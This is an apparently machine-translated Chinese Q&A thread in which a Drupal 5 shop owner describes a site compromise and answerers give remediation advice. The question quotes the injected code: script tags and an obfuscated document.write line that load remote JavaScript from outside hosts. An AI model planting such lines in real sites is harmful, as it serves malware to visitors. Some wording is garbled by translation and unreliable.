这是关于基于Drupal 5的在线商店。
突然之间,它不再工作了。 在访问该网站时,出现这个错误:
parsing错误:语法错误,第38行的/home/public_html/index.php中出现意外的“<”
在进一步检查后,我发现在index.php结尾处有两行:
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script> <!--7379ba6e55616ea66ac9d812fc0597ba--> 手动删除这两行后,该网站似乎再次正常工作。
但在更多的问题(编辑页面)被报告后,我发现实际上所有* .js文件都是“感染”的。 他们都在最后包含一个额外的行:
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
这个网站被黑了吗? 在search“blog.nodisposable.com”时,没有什么有趣的事情发生。 该网站本身似乎是合法的。 这可能是黑客自己?
谁能解释这是怎么发生的? 我能做些什么来扭转这种情况? 而我将来可以做些什么来避免这种情况呢?
恢复网站的备份(不是数据库)后,又发生了,但现在脚本标记指向dolfy.sedonahyperbarics.com:8080/XHTML.js 。
显然,很多随机Drupal用户帐户也被创build。 所以这可能是一个实际上是Drupal漏洞的标志。
我们删除了它们,并且仅将用户帐户创build限制到pipe理员(应该从一开始就是这样,我知道:-s)。 我们还将pipe理员用户密码更改为更安全的内容 。
希望现在不会回来。
如果它被黑了,你不知道是否安装了后门。
重新格式化后,您可能必须从已知好的备份重新安装。
永远不要相信系统中有入侵者的系统。
为了避免将来出现这种情况,您必须跟上更新的步伐,并订阅能够及时了解所运行软件(drupal列表,平台安全列表等)的漏洞和最佳实践的列表。 ,还可以将服务locking到只有使用该系统所需的用户,使用安全密码,不做明文forms的任何事情,以及安全最佳实践中的所有其他内容,这些都超出了答案的范围。 并保持良好的备份,并进行入侵检测(如类似Tripwire的系统)来检查入侵者的活动。
是的,你感染了,恐怕 不幸的是,如果没有大量的时间和精力投入,“怎么办”是不可能的。 这可能是Drupal安装(或其中一个模块)中的漏洞,也可能是同一台服务器上另一个应用程序中的漏洞,它可能是一个弱(或被盗)的FTP密码等等。可能的入口点。
我看到一些非常相似(几乎相同)的东西,但与Drupal无关,这绝对是一个黑客。
像其他人一样,如果没有更多关于您的环境的信息,很难知道。 你可以做一个简单的事情来阻止它被服务,就是在你的.htaccess文件中join一个指令来拒绝或者redirect任何请求到这个.js文件。
虽然完全根据我自己的经验,每一个这样的黑客,特别是再次感染,是由于有人通过FTP访问服务器,他们的本地计算机被感染,窃取凭据 – 你想检查FTP日志,并确保你认识到所有的IP地址和更新是有效的 – 如果有什么东西在重新感染,你应该很容易地看到它,如果是这样的话。